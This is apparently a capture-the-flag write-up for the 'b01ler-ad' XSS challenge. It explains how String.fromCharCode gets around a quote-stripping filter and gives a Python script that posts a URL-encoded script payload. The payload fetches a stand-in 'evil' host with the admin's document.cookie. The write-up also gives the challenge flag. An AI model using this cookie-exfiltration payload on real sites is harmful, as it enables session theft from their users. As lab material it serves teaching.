# web/b01ler-ad
> Ads Ads Ads! Cheap too! You want an Ad on our site? Just let us know!
`http://b01ler-ads.hammer.b01le.rs`

XSS challenge - We are allowed to input any html data we want and the admin visits that but the content should not contain quotes, double quotes and backticks:

Main challenge
```js
const content = req.body.content.replace("'", '').replace('"', '').replace("`", '');
const urlToVisit = CONFIG.APPURL + '/admin/view/?content=' + content;
```

We can use `String.fromCharCode` https://charcode98.neocities.org/ to avoid using quotes and encode our URL before sending it to the admin. Admin visits our site with their cookies in the query.

```python
import requests
url = 'http://b01ler-ads.hammer.b01le.rs/review'

# fetch('evil[.]com?cookie'=document.cookie)
payload = """
<script>
var url = String.fromCharCode(104, 116, 116, 112, 58...)
fetch(url+ encodeURI(document.cookie))
</script>
"""

encoded = "%3Cscript%3E%0A%20%20%20%20let%20url%20%3D%20String%2EfromCharCode%28104%2C%20116%2C%20116%2C%20112%2C%2058%2E%2E%2E%29%0A%20%20%20%20fetch%28url%20%20encodeURI%28document%2Ecookie%29%29%0A%3C%2Fscript%3E"

data = {
'content':encoded
}

r = requests.post(url, data=data)
print(r.text)
```


**flag**: bctf{wow_you_can_get_a_free_ad_now!}